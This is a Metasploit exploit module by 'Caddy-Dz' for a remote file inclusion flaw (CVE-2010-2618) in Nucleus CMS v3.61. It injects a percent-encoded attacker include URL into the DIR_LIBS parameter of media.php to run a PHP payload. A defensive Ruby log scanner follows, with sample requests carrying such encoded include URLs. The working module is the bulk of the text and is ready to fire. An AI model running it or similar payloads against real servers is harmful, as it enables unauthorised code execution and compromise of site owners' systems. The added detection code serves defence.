Title: Nucleus v3.61 Remote File Include (MSF)
Author: Caddy-Dz
Download: http://sourceforge.net/projects/nucleuscms/

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Remote::HttpServer::PHPInclude

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Nucleus v3.61 Remote File Include Exploit',
      'Description'    => %q{
          This module can be used to exploit Remote File Inclusion in Nucleus v3.61 in media.php
      },
      'Author'         => [ 'Caddy-Dz' ],
      'License'        => MSF_LICENSE,
      'Version'        => '$Revision:$',
      'References'     =>
        [
          [ 'CVE', '2010-2618' ],
          [ 'BID', '41116' ],
        ],
      'Privileged'     => false,
      'Payload'        =>
        {
          'DisableNops' => true,
          'Compat'      =>
            {
              'ConnectionType' => 'find',
            },
          'Space'       => 262144, # 256k
        },
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        => [[ 'Automatic', { }]],
      'DisclosureDate' => 'Sep 13 2011',
      'DefaultTarget'  => 0))

    # PHPURI is the request template; !URL! marks where the include URL is substituted.
    register_options([
      OptString.new('PHPURI', [ true, "The URI to request, with the include parameter changed to !URL!", '/nucleus/media.php?DIR_LIBS=!URL!']),
    ], self.class)
  end

  def php_exploit
    timeout = 0.01

    # Every byte of the include URL is percent-encoded before it is placed in DIR_LIBS.
    uri = datastore['PHPURI'].gsub('!URL!', Rex::Text.to_hex(php_include_url, "%"))
    print_status("Trying uri #{uri}")

    response = send_request_raw({
      'global' => true,
      'uri'    => uri,
    }, timeout)

    if response and response.code != 200
      print_error("Server returned non-200 status code (#{response.code})")
    end

    handler
  end
end
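
For defenders, an added example (not part of the original module or of the Nucleus project): a web access-log check for requests matching the module's default PHPURI. Because the module percent-encodes every byte of the include URL with Rex::Text.to_hex, the check decodes the DIR_LIBS value before testing it for a URL scheme. The function names, the combined-log format and the sample log lines are assumptions constructed for illustration.

```ruby
require 'uri'

# Script and parameter taken from the module's default PHPURI option.
TARGET_SCRIPT = 'media.php'
TARGET_PARAM  = 'DIR_LIBS'
# A value that starts with "scheme://" after decoding points at a remote resource.
URL_SCHEME = %r{\A\s*[a-z][a-z0-9+.\-]*://}i

# Percent-decode up to `rounds` times so single- and double-encoded values normalise.
def deep_decode(value, rounds = 3)
  rounds.times do
    decoded = (URI.decode_www_form_component(value) rescue nil)
    break if decoded.nil? || decoded == value
    value = decoded
  end
  value.scrub('?') # replace invalid bytes so later regex matching cannot raise
end

# Return the decoded DIR_LIBS value if the log line is a remote-include attempt, else nil.
def rfi_attempt(line)
  target = line[/"(?:GET|POST|HEAD) (\S+) HTTP\/[\d.]+"/, 1]
  return nil unless target
  path, query = target.split('?', 2)
  return nil unless query && deep_decode(path).end_with?("/#{TARGET_SCRIPT}")
  query.split(/[&;]/).each do |pair|
    key, value = pair.split('=', 2)
    next unless value && deep_decode(key) == TARGET_PARAM
    decoded = deep_decode(value)
    return decoded if decoded.match?(URL_SCHEME)
  end
  nil
end

# Constructed sample access-log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
  '198.51.100.7 - - [13/Sep/2011:10:00:01 +0000] "GET /nucleus/media.php?DIR_LIBS=%68%74%74%70%3a%2f%2f%31%39%32%2e%30%2e%32%2e%31%30%3a%38%30%38%30%2f%78%3f HTTP/1.1" 200 512',
  '198.51.100.8 - - [13/Sep/2011:10:00:05 +0000] "GET /nucleus/media.php?DIR_LIBS=http://192.0.2.10/x%3f HTTP/1.1" 200 512',
  '203.0.113.5 - - [13/Sep/2011:10:01:00 +0000] "GET /nucleus/media.php?action=selectmedia HTTP/1.1" 200 2048',
  '203.0.113.6 - - [13/Sep/2011:10:02:00 +0000] "GET /nucleus/index.php?itemid=3 HTTP/1.1" 200 4096'
].freeze

# Return [line_index, decoded_value] for every line flagged as an include attempt.
def scan(lines)
  lines.each_with_index.filter_map { |l, i| (v = rfi_attempt(l)) && [i, v] }
end

scan(SAMPLE_LOG).each { |i, v| puts "line #{i}: #{TARGET_PARAM} -> #{v}" } if __FILE__ == $PROGRAM_NAME
```

A plain substring match for `DIR_LIBS=http` would catch only the second sample line; the first, fully percent-encoded as the module sends it, is found only after decoding.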